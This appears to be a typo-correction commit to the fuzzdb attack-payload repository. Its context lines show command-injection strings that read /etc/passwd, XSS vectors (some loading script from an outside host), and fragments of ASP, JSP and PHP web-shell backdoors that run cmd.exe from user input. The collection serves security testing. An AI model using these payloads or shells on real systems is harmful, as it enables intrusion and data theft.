fuzzdb-project · jsoref · Sep 6, 2021 · Sep 6, 2021 · Sep 3, 2021 · Sep 6, 2021
diff --git a/attack/file-upload/README.md b/attack/file-upload/README.md
@@ -4,7 +4,7 @@ see:  http://cwe.mitre.org/data/definitions/434.html
 
 * kinds of file upload verifications:
  * content-type
- * filename extension verificationi (whitelist, blacklist)
+ * filename extension verification (whitelist, blacklist)
  * file content checking
  * client side, ha ha ha
 

diff --git a/attack/http-protocol/hpp.txt b/attack/http-protocol/hpp.txt
@@ -1,4 +1,4 @@
-# HTTP paramter polution and interpretation payloads by Jacco van Tuijl
+# HTTP parameter pollution and interpretation payloads by Jacco van Tuijl
 ?id=id=1
 &id=1?id=2
 ?id['&id=1']=2

diff --git a/attack/os-cmd-execution/README.md b/attack/os-cmd-execution/README.md
@@ -30,14 +30,14 @@ Example IFS netcat backdoor without spaces:<br>
 
 $IFS shell variable:<br>
 ``` cat$IFS/etc/passwd ```<br>
-increment the first +1 to retreive the entire file, line by line<br>
+increment the first +1 to retrieve the entire file, line by line<br>
 ``` cat$IFS/etc/passwd|tail$IFS-n+1|head$IFS-n+1 ```
 
 Shell Variables:<br>
 ``` CMD=$'cat\x20/etc/passwd';$CMD ```
 
 shell variable, increment through file one line at a time: <br>
-increment the first +1 to retreive the entire file, line by line<br>
+increment the first +1 to retrieve the entire file, line by line<br>
 ``` SP=$'\x20';cat$SP/etc/passwd|tail$SP-n+1|head$SP-n+1 ```
 
 **Exfiltrating Files / Data**

diff --git a/attack/sql-injection/exploit/README.md b/attack/sql-injection/exploit/README.md
@@ -11,7 +11,7 @@ various useful post-exploitation commands
 **mysql-injection-login-bypass.fuzz.txt**
 * regex replace as many as you can with your fuzzer for best results:
 * <user-fieldname> <pass-fieldname> <username> 
-* also try to brute force a list of possible usernames, including possile admin acct names
+* also try to brute force a list of possible usernames, including possible admin acct names
 
 **mysql-read-local-files.fuzz.txt**
 * mysql local file disclosure through sqli

diff --git a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
@@ -427,7 +427,7 @@ Author Name: ha.ckers.org
 Extraneous Open Brackets
 Exploit Name: Extraneous Open Brackets
 Exploit String: <<SCRIPT>alert("XSS");//<</SCRIPT>
-Exploit Description: (Submitted by Franz Sedlmaier http://www.pilorz.net/).  This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course).  The double slash comments out the ending extraneous bracket to supress a JavaScript error.
+Exploit Description: (Submitted by Franz Sedlmaier http://www.pilorz.net/).  This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course).  The double slash comments out the ending extraneous bracket to suppress a JavaScript error.
 Exploit Tags: general, obfuscated
 Author Name: ha.ckers.org
 
@@ -518,8 +518,8 @@ Exploit Description: HTML entities (the semicolons are required for this to work
 Exploit Tags: general, evil tags, obfuscated, internet explorer
 Author Name: ha.ckers.org
 
-HTML Quoute & Comment breaker
-Exploit Name: HTML Quoute & Comment breaker
+HTML Quote & Comment breaker
+Exploit Name: HTML Quote & Comment breaker
 Exploit String: '';!--"<script>alert(0);</script>=&{(alert(1))}
 Exploit Description: This vector breaks HTML quotes and comments.
 Exploit Tags: general, html breaking, comment breaking
@@ -547,7 +547,7 @@ Author Name: .mario
 IE closing-tag expression injection
 Exploit Name: IE closing-tag expression injection
 Exploit String: </a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
-Exploit Description: This vector exploits a bug in IE whre attributes in closing comments are evaluated.
+Exploit Description: This vector exploits a bug in IE where attributes in closing comments are evaluated.
 Exploit Tags: general, injection, internet explorer
 Author Name: .mario
 
@@ -581,7 +581,7 @@ Exploit String: a=<a>
 </b>
 </a>
 document.write(unescape(a..b))
-Exploit Description: This vector writes an erroneous image tag with onerror hanlder inside an E4X construct into the document context.
+Exploit Description: This vector writes an erroneous image tag with onerror handler inside an E4X construct into the document context.
 Exploit Tags: general, obfuscated, gecko, XML predicates, evil tags
 Author Name: .mario
 
@@ -865,7 +865,7 @@ Author Name: ha.ckers.org
 Mozilla -moz-binding-url injection
 Exploit Name: Mozilla -moz-binding-url injection
 Exploit String:  style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
-Exploit Description: The vector incudes a binding file via injected style attrbute. Gecko only.
+Exploit Description: The vector incudes a binding file via injected style attribute. Gecko only.
 Exploit Tags: general, injection, gecko, style injection, XBL
 Author Name: .mario
 
@@ -876,8 +876,8 @@ Exploit Description: This vector was once used on a major site to evade a stripp
 Exploit Tags: general, injection, gecko, style injection, XBL
 Author Name: PHPIDS Group
 
-Multiline selfcontained XSS
-Exploit Name: Multiline selfcontained XSS
+Multiline self-contained XSS
+Exploit Name: Multiline self-contained XSS
 Exploit String: _
 =
 eval
@@ -1274,7 +1274,7 @@ Author Name: PHPIDS Group
 Self-contained XSS variant 2
 Exploit Name: Self-contained XSS variant 2
 Exploit String: a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b))
-Exploit Description: Concatenates fragmented functions to evakuate the location hash
+Exploit Description: Concatenates fragmented functions to evaluate the location hash
 Exploit Tags: general, self contained
 Author Name: PHPIDS Group
 
@@ -1366,7 +1366,7 @@ content: “\61\6c\65\72\74\28\31\29″
 eval(eval(document.styleSheets[0].cssRules[0].style.content))
 </script>
 Exploit Description: This vector utilizes the CSS content property and fetches it off the document.styleSheets property afterwards. For correct execution of the payload a double-eval is needed.
-Exploit Tags: general, onfuscated, style injection
+Exploit Tags: general, obfuscated, style injection
 Author Name: .mario
 
 STYLE w/Anonymous HTML

diff --git a/discovery/WebSocket/WebSocket-subprotocols.txt b/discovery/WebSocket/WebSocket-subprotocols.txt
@@ -1,12 +1,12 @@
 # this list can be used to enumerate supported Web Socket sub protocols of a web socket server
-# It conyains the official IANA registerd Web Socket sub protocols
+# It contains the official IANA registered Web Socket sub protocols
 # Source: https://www.iana.org/assignments/websocket/websocket.xml
 # Example subprotocol request header:
 # Sec-WebSocket-Protocol: mqtt, wamp
 # The Web Socket client can include a list of the protocols when making the initial HTTP request. 
 # The server is then required to either select one of those protocols and include it in a response header.
 # If none of the sub protocols send by the client are supported by the server, 
-# the server shoud fail the handshake and terminate the connection.
+# the server should fail the handshake and terminate the connection.
 MBWS.huawei.com
 MBLWS.huawei.com
 soap

diff --git a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
diff --git a/docs/misc/KL0209LIT_fffap.html b/docs/misc/KL0209LIT_fffap.html
@@ -89,7 +89,7 @@
 
 Fuzzing includes a lot of testing. You could spend hours and hours modifying and compiling and running the same but slightly
 different code over and over just to get the better results. Planning, preparation, and testing are a part of fuzzing, and
-laboring hours on end for the humble task of perfection, stability, and reproduceability can thankfully be very rewarding.
+laboring hours on end for the humble task of perfection, stability, and reproducibility can thankfully be very rewarding.
 
 Fuzzing is useful because...
 
@@ -569,7 +569,7 @@
 3.2 Writing the Fuzzer
 
 This example for SFTP fuzzing will be written in PERL and will be using libssh2/Net::SSH2 (this is not the only way to use
-and fuzz SFTP, other libaries and extensions that may be more extensive and/or low-level are available).
+and fuzz SFTP, other libraries and extensions that may be more extensive and/or low-level are available).
 
 [sftpfuzz.pl]
 

diff --git a/regex/nsa-wordlist.txt b/regex/nsa-wordlist.txt
@@ -5,7 +5,7 @@ Information Security
 Information Warfare
 IW
 IS
-Priavacy Information 
+Privacy Information 
 Terrorism
 Defensive
 Information Defense
@@ -36,7 +36,7 @@ CIA
 S/Key
 SSL
 FBI
-Secert Service
+Secret Service
 USSS
 Defcon
 Military
@@ -212,7 +212,7 @@ MI6
 Kh-11
 Shayet-13
 SADMS
-Spetznaz
+Spetsnaz
 Recce
 707
 CIO
@@ -663,7 +663,7 @@ COS
 E.T.
 credit card fraud
 b9
-assasinate
+assassinate
 virus
 anarchy
 rogue
@@ -1008,6 +1008,6 @@ China
 Conficker
 Worm
 Scammers
-Suspecious
+Suspicious
 Social media
 
diff --git a/web-backdoors/asp/cmdasp.aspx b/web-backdoors/asp/cmdasp.aspx
@@ -5,7 +5,7 @@
 void Page_Load(object sender, EventArgs e)
 {
 }
-string ExcuteCmd(string arg)
+string ExecuteCmd(string arg)
 {
 ProcessStartInfo psi = new ProcessStartInfo();
 psi.FileName = "cmd.exe";
@@ -21,7 +21,7 @@ return s;
 void cmdExe_Click(object sender, System.EventArgs e)
 {
 Response.Write("<pre>");
-Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
+Response.Write(Server.HtmlEncode(ExecuteCmd(txtArg.Text)));
 Response.Write("</pre>");
 }
 </script>
@@ -32,7 +32,7 @@ Response.Write("</pre>");
 <body >
 <form id="cmd" method="post" runat="server">
 <asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
-<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
+<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="execute" OnClick="cmdExe_Click"></asp:Button>
 <asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
 </form>
 </body>

diff --git a/web-backdoors/asp/file.asp b/web-backdoors/asp/file.asp
@@ -116,7 +116,7 @@ end if
 
 <%
 ' get the path to work with, if it isn't set or valid then start with the web root
-' goofy if statement is used since vbscript doesn't use short-curcuit logic
+' goofy if statement is used since vbscript doesn't use short-circuit logic
 path = trim(Request.QueryString("path"))
 if len(path) = 0 then
 	path = fso.GetFolder(Server.MapPath("\"))

diff --git a/web-backdoors/asp/ntdaddy.asp b/web-backdoors/asp/ntdaddy.asp
@@ -101,7 +101,7 @@ FileAttributes  =  "Volume"
 case  16
 FileAttributes  =  "Directory"
 case  19
-FileAttributes  =  "Read  Only,  Hidden,  Directoy"
+FileAttributes  =  "Read  Only,  Hidden,  Directory"
 case  23
 FileAttributes  =  "Read  Only,  Hidden,  System,  Directory"
 case  32
@@ -188,7 +188,7 @@ FolderAttributes  =  "Read  Only,  Directory"
 case  18  'Extra
 FolderAttributes  =  "Hidden,  Directory"
 case  19
-FolderAttributes  =  "Read  Only,  Hidden,  Directoy"
+FolderAttributes  =  "Read  Only,  Hidden,  Directory"
 case  20  'Extra
 FolderAttributes  =  "System,  Directory"
 case  22  'Extra
@@ -489,7 +489,7 @@ FolderAttributes  =  "Read  Only,  Directory"
 case  18  'Extra
 FolderAttributes  =  "Hidden,  Directory"
 case  19
-FolderAttributes  =  "Read  Only,  Hidden,  Directoy"
+FolderAttributes  =  "Read  Only,  Hidden,  Directory"
 case  20  'Extra
 FolderAttributes  =  "System,  Directory"
 case  22  'Extra
@@ -600,7 +600,7 @@ FileAttributes  =  "Volume"
 case  16
 FileAttributes  =  "Directory"
 case  19
-FileAttributes  =  "Read  Only,  Hidden,  Directoy"
+FileAttributes  =  "Read  Only,  Hidden,  Directory"
 case  23
 FileAttributes  =  "Read  Only,  Hidden,  System,  Directory"
 case  32

diff --git a/web-backdoors/asp/proxy.asp b/web-backdoors/asp/proxy.asp
@@ -130,7 +130,7 @@ Dim r
 	r.IgnoreCase = true
 	r.Global = true
 
-	' remove the laudurl paramater 
+	' remove the laudurl parameter 
 	r.Pattern = "laudurl=[^&]+($|&)"
 	CleanFormValues = r.Replace(request.form, "") 
 	Set r = nothing

diff --git a/web-backdoors/asp/shell.aspx b/web-backdoors/asp/shell.aspx
@@ -57,7 +57,7 @@ void Page_Load(object sender, System.EventArgs e) {
 	// Check for an IP in the range we want
 	string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1"};
 
-	// check if the X-Fordarded-For header exits
+	// check if the X-Forwarded-For header exits
 	string remoteIp;
 	if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
 		remoteIp = Request.UserHostAddress;

diff --git a/web-backdoors/cfm/shell.cfm b/web-backdoors/cfm/shell.cfm
@@ -18,7 +18,7 @@
 ***
 ********************************************************************************
 ***
-*** This file provides access to shell acces on the system.
+*** This file provides access to shell access on the system.
 *** Modified by Tim Medin
 *** Modified by Matt Presson <@matt_presson>
 ***     - Added some basic authentication via HTTP header

diff --git a/web-backdoors/jsp/browser.jsp b/web-backdoors/jsp/browser.jsp
@@ -34,13 +34,13 @@
     //If true, the user is allowed to browse only in RESTRICT_PATH,
     //if false, the user is allowed to browse all directories besides RESTRICT_PATH
     private static final boolean RESTRICT_WHITELIST = false;
-    //Paths, sperated by semicolon
+    //Paths, separated by semicolon
     //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!!
 	private static final String RESTRICT_PATH = "/etc;/var";
 
     //The refresh time in seconds of the upload monitor window
 	private static final int UPLOAD_MONITOR_REFRESH = 2;
-	//The number of colums for the edit field
+	//The number of columns for the edit field
 	private static final int EDITFIELD_COLS = 85;
 	//The number of rows for the edit field
 	private static final int EDITFIELD_ROWS = 30;
@@ -66,14 +66,14 @@
 	 */
 	private static final int COMPRESSION_LEVEL = 1;
 	/**
-	 * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the
+	 * The FORBIDDEN_DRIVES are not displayed on the list. This can be useful, if the
 	 * server runs on a windows platform, to avoid a message box, if you try to access
 	 * an empty removable drive (See KNOWN BUGS in Readme.txt).
 	 */
 	private static final String[] FORBIDDEN_DRIVES = {"a:\\"};
 
 	/**
-	 * Command of the shell interpreter and the parameter to run a programm
+	 * Command of the shell interpreter and the parameter to run a program
 	 */
 	private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows
 	//private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; 	// Unix
@@ -1570,7 +1570,7 @@ Upload finished.
 		for(var x=0;x<document.FileList.elements.length;x++){
 			var y = document.FileList.elements[x];
 			var ytr = y.parentNode.parentNode;
-			var check = document.FileList.selall.checked;
+			var check = document.FileList.selectAll.checked;
 			if(y.name == 'selfile'){
 				if (y.disabled != true){
 					y.checked = check;
@@ -1754,7 +1754,7 @@ Upload finished.
 				}
 			}%>
 	</table>
-	<input type="checkbox" name="selall" onClick="AllFiles(this.form)">Select all
+	<input type="checkbox" name="selectAll" onClick="AllFiles(this.form)">Select all
 	<p align=center>
 		<b title="<%=totalSize%> bytes">
 		<%=convertFileSize(totalSize)%></b><b> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%>

diff --git a/web-backdoors/php/dns.php b/web-backdoors/php/dns.php
@@ -60,7 +60,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-opertor (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarily makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {

diff --git a/web-backdoors/php/file.php b/web-backdoors/php/file.php
@@ -61,7 +61,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-opertor (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarily makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {

diff --git a/web-backdoors/php/host.php b/web-backdoors/php/host.php
@@ -59,7 +59,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-opertor (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarily makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {

diff --git a/web-backdoors/php/killnc.php b/web-backdoors/php/killnc.php
@@ -62,7 +62,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-opertor (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarily makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {